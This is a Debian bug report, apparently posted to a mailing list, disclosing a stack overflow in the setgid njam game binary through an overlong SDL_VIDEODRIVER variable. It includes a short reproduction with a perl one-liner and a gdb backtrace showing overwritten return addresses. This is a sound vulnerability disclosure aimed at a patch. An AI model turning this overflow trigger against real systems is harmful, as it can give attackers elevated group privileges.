Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
The setgid(games) binary /usr/games/njam makes insecure use of the
environmental variable SDL_VIDEODRIVER.
This potentially allows the execution of arbitrary code, as the
following example shows:
1. Setup the variable:
birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300")
2. Launch the binary under gdb so we can see what happens:
birthday:~# gdb /usr/games/njam
(gdb) run
Starting program: /usr/games/njam
..
Program received signal SIGSEGV, Segmentation fault.
0x0000000000404f48 in ?? ()
(gdb) bt
0 0x0000000000404f48 in ?? ()
1 0x7878787878787878 in ?? ()
2 0x7878787878787878 in ?? ()
3 0x7878787878787878 in ?? ()
0x78 == "x" == Code execution via overflow.
This is probably a minor issue, but should be simple to patch.
-- System Information:
Debian Release: 6.0.3
APT prefers stable
APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages njam depends on:
ii libc6 2.11.2-10 Embedded GNU C Library: Shared lib
ii libgcc1 1:4.4.5-8 GCC support library
ii libsdl-image1.2 1.2.10-2+b2 image loading library for Simple D
ii libsdl-mixer1.2 1.2.8-6.3 mixer library for Simple DirectMed
ii libsdl-net1.2 1.2.7-2 network library for Simple DirectM
ii libsdl1.2debian 1.2.14-6.1 Simple DirectMedia Layer
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
njam recommends no packages.
njam suggests no packages.
-- no debconf information
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
